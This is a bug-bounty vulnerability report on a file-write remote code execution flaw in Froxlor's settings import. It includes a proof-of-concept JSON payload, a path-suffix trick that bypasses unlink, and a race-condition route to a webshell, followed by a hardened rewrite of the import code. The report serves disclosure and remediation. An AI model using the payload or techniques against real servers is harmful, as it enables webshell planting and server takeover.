Remote Code Execution Vulnerability Through Unrestricted File Write

huntr report ABA6BEAA-570E-4523-8128-DA4D8E374EF6
Reported by renhaot, Mar 04, 2023, 14:13
Source: www.huntr.dev

Tags: vulnerability, remote code execution, file write, webshell, unlink function, security bug, proof of concept, time gap, multi-threading, bug bounty

EPSS: 0.001 (Low), percentile 34.0%

Description

In the settings import function, in the file Froxlor\lib\Froxlor\SImExporter.php:

// 1. The user-supplied data is written to the user-supplied path first.
file_put_contents($img_filename, $img_data);

// 2. Only afterwards is the content type checked ...
if (function_exists('finfo_open')) {
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_file($finfo, $img_filename);
    finfo_close($finfo);
} else {
    $mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
    $mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
    // 3. ... and the already-written file is removed on failure, with errors suppressed by '@'.
    @unlink($img_filename);
    throw new Exception("Uploaded file is not a valid image");
}

// 4. The extension is taken from the user-supplied path, again after the write.
$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);

if (!in_array($file_extension, [
    'jpeg',
    'jpg',
    'png',
    'gif'
])) {
    @unlink($img_filename);
    throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}

The code first writes the data provided by the user to the file path provided by the user.

Only then does it verify the file extension. If the check fails, it deletes that file through the unlink function.

Unfortunately, there is a small trick between the file_put_contents and unlink calls. If we set the file path to /img/a.php/., file_put_contents saves the file as /img/a.php, but unlink cannot delete /img/a.php/. and the file stays in place.

Proof of Concept

So, here is our proof of concept.

{
    "panel.version": "2.0.13",
    "panel.db_version": "202302030",
    "_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
    "a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
    "a.b": "/img/a.php/."
}

If we import this file in the settings panel, it writes the content <?php phpinfo(); into img/a.php on the web server.

attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing

Also, it's worth noting that we can still exploit this vulnerability even without a trick for the unlink function. Because the code writes the file before deleting it, the time gap between the write and the unlink is enough for us to access our webshell from another thread. Hope this gets noticed when it's fixed.
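Both weaknesses described above, the unlink bypass via a path suffix and the write-then-delete time gap, come from the same ordering: an attacker-controlled path is written before anything is validated. The following is an added example, not Froxlor's own code, of how the same import step can be structured so that nothing touches the disk until validation has passed and the destination name is chosen by the server. The function and parameter names (import_image_setting, $stagingDir, $imgDir) and the paths in the usage comment are assumptions for illustration.

```php
<?php
// Added example (not Froxlor's code): validate first, write to a private staging
// area, then atomically move into the image directory under a server-chosen name.

function import_image_setting(string $stagingDir, string $imgDir, string $requestedName, string $b64Data): string
{
    // Derive the stored name ourselves. basename() drops every directory part, so a
    // request for "/img/a.php/." becomes "." and is rejected below; "/img/a.php/"
    // becomes "a.php" and fails the extension check. The character allow-list removes
    // anything else a path parser might interpret, and requiring exactly one dot also
    // rules out double extensions such as "a.php.png".
    $base = preg_replace('/[^A-Za-z0-9_.-]/', '', basename($requestedName));
    if ($base === '' || $base[0] === '.' || substr_count($base, '.') !== 1) {
        throw new InvalidArgumentException('Invalid image name');
    }

    // Extension check happens before any write, and each extension is tied to the
    // one MIME type it may carry.
    $expectedMime = [
        'jpeg' => 'image/jpeg',
        'jpg'  => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
    ];
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!isset($expectedMime[$ext])) {
        throw new InvalidArgumentException('Invalid file-extension, use one of: jpeg, jpg, png, gif');
    }

    $data = base64_decode($b64Data, true);
    if ($data === false || $data === '') {
        throw new InvalidArgumentException('Image data is not valid base64');
    }

    // Sniff the type from the in-memory buffer. A rejected upload therefore never
    // exists on disk, so there is no write-then-unlink window for a second request.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_buffer($finfo, $data);
    finfo_close($finfo);
    if ($mimetype !== $expectedMime[$ext]) {
        throw new InvalidArgumentException('Uploaded file is not a valid image');
    }

    // Stage the bytes in a directory the web server does not serve. tempnam() silently
    // falls back to the system temp dir if $stagingDir is unusable, so verify where the
    // file actually landed. $stagingDir is assumed to be on the same filesystem as
    // $imgDir so that the rename() below is an atomic move rather than a copy.
    $tmp = tempnam($stagingDir, 'imgimport_');
    if ($tmp === false || realpath(dirname($tmp)) !== realpath($stagingDir)) {
        if ($tmp !== false) {
            @unlink($tmp);
        }
        throw new RuntimeException('Staging directory is not available');
    }
    if (file_put_contents($tmp, $data) !== strlen($data)) {
        @unlink($tmp);
        throw new RuntimeException('Could not stage image');
    }

    // Resolve the destination directory ourselves; the request never supplies it.
    $realDir = realpath($imgDir);
    if ($realDir === false || !is_dir($realDir)) {
        @unlink($tmp);
        throw new RuntimeException('Image directory is not available');
    }
    $dest = $realDir . DIRECTORY_SEPARATOR . $base;

    // Make the file world-readable for the web server, then publish it in one step.
    chmod($tmp, 0644);
    if (!rename($tmp, $dest)) {
        @unlink($tmp);
        throw new RuntimeException('Could not store image');
    }
    return $dest;
}

// Usage (assumed paths): the stored file is always <imgDir>/<sanitised name>; the
// request only influences the base name, never the directory or the extension set.
// $path = import_image_setting('/srv/app/staging', '/srv/app/public/img',
//                              $settings['a.b'], $settings['a.b.image_data']);
```

A server-side name and a validate-before-write order close both issues in the report; as defence in depth, the image directory should also be configured so the web server never executes scripts from it, since a file that begins with a valid image header can still carry PHP tags past a MIME sniff.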
